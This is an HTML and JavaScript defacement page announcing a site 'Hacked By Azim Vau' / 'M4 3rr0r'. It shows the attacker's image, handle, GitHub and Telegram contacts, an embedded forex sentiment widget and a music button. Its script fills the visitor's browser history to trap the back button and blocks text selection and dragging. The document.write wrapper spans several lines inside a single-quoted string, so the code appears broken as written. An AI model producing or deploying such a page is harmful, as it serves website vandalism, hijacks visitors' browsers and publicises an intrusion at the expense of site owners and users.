<script language="javascript">
<!--
// == Hi Mr. Error is Here :) == //
document.write(unescape('<html>
	<head> <link rel="icon" type="image/png" href="https://raw.githubusercontent.com/Azim-vau/Azim-vau/main/IMAGE/azimvau.gif" type="image/x-icon" /> 
	<title>Hacked By Azim Vau </title>
   <meta charset="utf-8">
   <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
   <meta name="google-site-verification" content="VxSee7" />
   <meta name="theme-color" content="black">
   <meta http-equiv="Content-Type" content="text/html; charset=Windows-1254" />
   <meta name="description" content=" this site has been hacked by mr error ">
   <meta name="author" content="Azim-Vau" />
   <meta name="keywords" content="Mr Error" />
   <meta name="googlebot" content="all" />
   <meta name="robots" content="all" />
   <meta name="googlebot-news" content="all" />
   <meta name="google" content="notranslate" />
   <meta name="og:title" content="Hacked by M4 3rr0r" />
   <meta property="og:image" content="picture" src="https://raw.githubusercontent.com/Azim-vau/Azim-vau/main/IMAGE/azimvau.gif" />
   <meta property="og:type" content="website" /> <meta property="og:updated_time" content="1440432930" /> </span>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> 
  </head> 

<style type="text/css"> @import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-image: url("https://64.media.tumblr.com/f816c9430a4851bb196e559ade3a99ad/tumblr_paqhc18jmD1xp1j77o1_640.gif"); } i{ margin:10px; color: red; } a:link{ color:#000; } h1{ color: #000; text-decoration: none; border-radius:0px; border:0px; font-family: 'Shadows Into Light', cursive; font-size:50px; margin:0px; padding:0px; animation:psychoxploit 0.5s linear infinite; } pre{ color:grey; } marquee{ width:100%; } @keyframes psychoxploit{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style> 

<body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); 


</script>

<center> 
	<img title="Hacked by Mr. Error" class="picture" src="https://raw.githubusercontent.com/Azim-vau/Azim-vau/main/IMAGE/azimvau.gif" height="28%" widht="28%" /> <br>

		<h1><font color="red">Forex Market Sentiments</font> M4 3rr0r  </h1><br>

<center>
<!-- myfxbook.com outlook widget - Start -->
<div>
    <script class="powered" type="text/javascript"
            src="https://widgets.myfxbook.com/scripts/fxOutlook.js?type=1&symbols=,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,31,32,33,34,36,37,38,40,41,42,43,45,46,47,48,49,50,51,103,107,129,131,136,137,1209,1233,1234,1235,1236,1245,1246,1247,1249,1252,1253,1259,1260,1327,1692,1694,1773,1778,1781,1806,1815,1816,1863,1864,1893,1959,1965,2012,2076,2090,2099,2103,2114,2115,2119,2326,2348,2438,2482,2511,2516,2519,2521,2603,2694,2729,2872,3001,3005,3240,3304,3473,3771,3887,4845,4963,5079,5281,5435,5539,5779,5851,5858,5879,6106,8397,8669,8686,8895,8899,9657,9667,10064,12755,13517,14216,14247,17184,19780,20010,34882,54505,69230,79789,123633,177761,356365,356944,356945,367960,397724"></script>
</div>
<div style="font-size: 10px">
<a href="https://www.myfxbook.com" title="" class="myfxbookLink" target="_self" rel="noopener">
            Powered by Myfxbook.com</a>
    </div>

<script type="text/javascript">showOutlookWidget()</script>
<!-- myfxbook.com outlook widget - End -->
<center>

Github : Azim-Vau<br>
Telegarm : @azimvau69 <br>
<br><br>
	
<marquee align="center" scrollamount="6" direction="scroll">
<pre>#Credit : - 
<i>M4 3rr0r [!] Thanks to: -Mr. Error (Azim Vau)  
</pre>
</marquee>
</body> 
</html>
<style>
  #tune{
  
  padding-top: 80px;
  text-align: center;
  
  }
  
  #tune button{
  
  font-size: 20px;
  padding: 10px 15px;
  border: none;
  outline: none;
  background: #f00000;
  border-radius: 5px;
  color: #000;
  transition: all 0.5s;
  
  }
  
  #tune button:hover{
  
  box-shadow: 0px 0px 20px #f00000;
  background: #000;
  color: #f00000;
  
  }
  
</style>

<center>
<div id="tune">
      <audio src="https://d.top4top.io/m_2197qbrzf0.mp3" id="audio" loop></audio>
      <button onclick="document.querySelector('#audio').play()">PLAY MUSIC</button>
</div>'));
//-->
</script>
